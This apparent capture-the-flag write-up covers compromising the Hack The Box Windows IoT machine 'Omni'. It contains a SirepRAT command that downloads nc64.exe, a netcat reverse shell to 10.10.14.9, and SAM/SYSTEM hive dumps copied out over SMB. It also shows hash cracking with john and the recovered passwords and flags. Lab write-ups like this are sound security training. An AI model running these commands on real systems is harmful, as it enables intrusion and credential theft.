# Omni ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F3Y78cZMUW7UnWa9LkHoW%2Fomni.png?alt=media\&token=44ac3d2a-56c7-4497-a3f2-9462ff6a8760) ## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.204 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Thu Jun 16 14:08:04 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.204 Nmap scan report for 10.10.10.204 Host is up (0.044s latency). Not shown: 65529 filtered tcp ports (no-response) PORT STATE SERVICE 135/tcp open msrpc 5985/tcp open wsman 8080/tcp open http-proxy 29817/tcp open unknown 29819/tcp open unknown 29820/tcp open unknown # Nmap done at Thu Jun 16 14:08:30 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds ``` Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p135,5985,8080,29817,29819,29820 10.10.10.204 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Thu Jun 16 14:09:33 2022 as: nmap -sCV -p135,5985,8080,29817,29819,29820 -oN targeted 10.10.10.204 Nmap scan report for 10.10.10.204 Host is up (0.038s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 5985/tcp open upnp Microsoft IIS httpd 8080/tcp open upnp Microsoft IIS httpd |_http-title: Site doesn't have a title. | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=Windows Device Portal |_http-server-header: Microsoft-HTTPAPI/2.0 29817/tcp open unknown 29819/tcp open arcserve ARCserve Discovery 29820/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port29820-TCP:V=7.92%I=7%D=6/16%Time=62AB1D85%P=x86_64-pc-linux-gnu%r(N SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10," SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0 SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x SF:c9}\xc8O\x12"); Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jun 16 14:10:48 2022 -- 1 IP address (1 host up) scanned in 75.72 seconds ``` If we take a look at the website on port *8080*, it will ask for some credentials that we don't have. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FPq8TmHo9LBvb0miv3wC8%2Fimage.png?alt=media\&token=d2f09f57-96ef-431d-a993-8734b00eb49c) Let's enumerate the website with the *whatweb* tool. > whatweb ``` http://10.10.10.204:8080 [401 Unauthorized] Cookies[CSRF-Token], Country[RESERVED][ZZ], HTTPServer[Microsoft-HTTPAPI/2.0], IP[10.10.10.204], Microsoft-HTTPAPI[2.0], WWW-Authenticate[Windows Device Portal][Basic] ``` ## Exploitation If we take a look at the result, we'll see the feature `Windows Device Portal`. At this point, I started looking for any common exploits associated to that feature, and I found [this ](https://github.com/SafeBreach-Labs/SirepRAT)exploit on GitHub. Download it, and install it with the following commands. > git clone > > cd SirepRat/ > > pip3 install -r requirements.txt > > python3 setup.py install This tool allow us to execute commands on the victim machine among other things.To get a reverse shell, we'll have to transfer the `nc64.exe` binary to the *Omni* machine. First, let's set a simple HTTP server with python on the directory where the `nc.exe` is located. > python -m http.server 80 Then, execute the SirepRAT tool, so that it will download the `nc64.exe` binary, and save it in the *AppLocker* bypass directory `C:\Windows\System32\spool\drivers\color\`. > python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return\_output --cmd "powershell" --args "/c iwr -uri -outfile C:\Windows\System32\spool\drivers\color\nc64.exe" * `--return_output` set to have the target device return the command **output** stream. * `-cmd` **program** to execute. * `-args` **arguments** string for the program. Once we transfer the `nc64.exe` binary to the victim machine, let's set a *netcat* listener on port *4444* with *rlwrap.* > rlwrap nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Now, we'll have to execute the `nc.exe` binary, so it send us a revere shell. > python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return\_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c c:\windows\system32\spool\drivers\color\nc64.exe -e cmd 10.10.14.9 4444' ``` listening on [any] 4444 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49671 Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved. C:\windows\system32> ``` ## Privilege Escalation We'll see that the `whoami` command doesn't work, but we can still know which user we are by viewing the value of the `%username%` variable. > echo $username% ``` omni$ ``` We could also see the users on the system. > net user ``` User accounts for \\ ------------------------------------------------------------------------------- Administrator app DefaultAccount DevToolsUser Guest sshd WDAGUtilityAccount The command completed with one or more errors. ``` Now, let's go to the root directory and find the *user* and *root* flags recursively. > dir /s user.txt root.txt * `/s` enumerate directories and subdirectories. ``` Volume in drive C is MainOS Volume Serial Number is 3C37-C677 Directory of C:\Data\Users\administrator 07/04/2020 09:48 PM 1,958 root.txt 1 File(s) 1,958 bytes Directory of C:\Data\Users\app 07/04/2020 09:53 PM 1,958 user.txt 1 File(s) 1,958 bytes Total Files Listed: 2 File(s) 3,916 bytes 0 Dir(s) 584,065,024 bytes free ``` If we try to view the flags, we'll see that have a different format. > type C:\Data\Users\administrator\root.txt C:\Data\Users\app\user.txt ``` System.Management.Automation.PSCredential System.Object System.Management.Automation.PSCredential flag 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7 C:\Data\Users\app\user.txt System.Management.Automation.PSCredential System.Object System.Management.Automation.PSCredential flag 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7 ``` In order to view the real flags, we'll have to use P*owerShell*, and execute the following command. > powershell > > (Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential().password ``` Import-CliXml : Error occurred during a cryptographic operation. At line:1 char:2 + (Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic Exception + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept ion,Microsoft.PowerShell.Commands.ImportClixmlCommand ``` But we get an error. Maybe it is because we don't have the right permissions. We'll see that we have `SYSTEM` privileges, and because of that, we could try to make a copy of the `SAM` and `SYSTEM` registries. First, let's create a new folder called `temp` on the root folder, and then make a copy of those registries. > mkdir C:\temp > > cd C:\temp > > reg save HKLM\sam sam.backup > > reg save HKLM\system system.backup Now, let's transfer those to our local machine. First, let's set an *SMB* server with *impacket*. > impacket-smbserver smbFolder $(pwd) -smb2support Then, copy the files to the *SMB* share. > copy sam.backup \10.10.14.9\smbFolder > > copy system.backup \10.10.14.9\smbFolder Once we have those files in our local machine, we could try to extract the hashes of the users with *secretsdump*. > impacket-secretsdump -system system.backup -sam sam.backup LOCAL * `-system` **SYSTEM** hive to parse. * `-sam` **SAM** hive to parse. ``` Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation [*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65::: sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea::: DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958::: app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95::: [*] Cleaning up... ``` Now, let's put those hashes in the `hashes` file, and try to break those with *john*. > john --wordlist=/usr/share/wordlists/rockyou.txt hashes --format=NT ``` Using default input encoding: UTF-8 Loaded 6 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=2 Press 'q' or Ctrl-C to abort, almost any other key for status (Guest) mesh5143 (app) 2g 0:00:00:03 DONE (2022-06-17 00:17) 0.5181g/s 3715Kp/s 3715Kc/s 16317KC/s _ 09..*7¡Vamos! Warning: passwords printed above might not be all those cracked Use the "--show --format=NT" options to display all of the cracked passwords reliably Session completed. ``` And we get the `mesh5143` password. We could try to log in with the user `app`, and that password in the website. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FmFC24KEf9Yf1zx06mlA1%2Fimage.png?alt=media\&token=4b0fb6c3-a6fa-4b2a-9829-841b088a1344) And we get in. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FKv4NkTdfc0nENzqtjEvY%2Fimage.png?alt=media\&token=ecda45c8-fcfc-48ee-b585-7cf78915fb2b) We'll see that we can run commands as the `app` user, from the `Processes` section. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FfsZeNmNWr6JUqbM8kdhL%2Fimage.png?alt=media\&token=ccdbb9bc-1901-4936-bfab-279a345bef6b) Now, let's set another netcat listener on port 4444 with netcat. > rlwrap nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. And now, send a reverse shell again, but this time as the `app` user. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FOne27EGNBOiBOmfi0LPQ%2Fimage.png?alt=media\&token=cc29446b-95f0-4c55-9af1-608d9863bd5a) ``` listening on [any] 4444 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49674 Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved. C:\windows\system32> ``` At this point, we could see the user flag with the same method as before. > powershell > > (Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential().password ``` 7cfd50f6bc34db3204898f1505ad9d70 ``` But, now we can't see the *root* flag. But there is a file with the same format as the flags on the `app` home folder called `iot-admin.xml`. If we try to see it's content, we'll see another password. > powershell > > (Import-CliXml -Path C:\data\users\app\iot-admin.xml).GetNetworkCredential().password ``` _1nt3rn37ofTh1nGz ``` Now, let's try to log in again in the website, but this time with the `administrator` user. You'll need to close and open your browser. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F2UsNxg3XoHWHa9mZOibB%2Fimage.png?alt=media\&token=2fbbfbcc-73e2-4edc-80d9-92b84f518df5) And we get in again, but as the `administrator` user. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F9uwvYH6NhzylCVl03jpy%2Fimage.png?alt=media\&token=1293b0b0-00e9-4354-9345-18c1d6e3eb1a) Now, let's send another reverse shell, but as the `administrator` user. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FOne27EGNBOiBOmfi0LPQ%2Fimage.png?alt=media\&token=cc29446b-95f0-4c55-9af1-608d9863bd5a) ``` listening on [any] 4444 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49674 Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved. C:\windows\system32> ``` Finally, as we are the `administrator` user, all we have to do is reap the harvest and take the root flag with the same method as before. > (Import-CliXml -Path C:\data\users\administrator\root.txt).GetNetworkCredential().password ``` 5dbdce5569e2c4708617c0ce6e9bf11d ```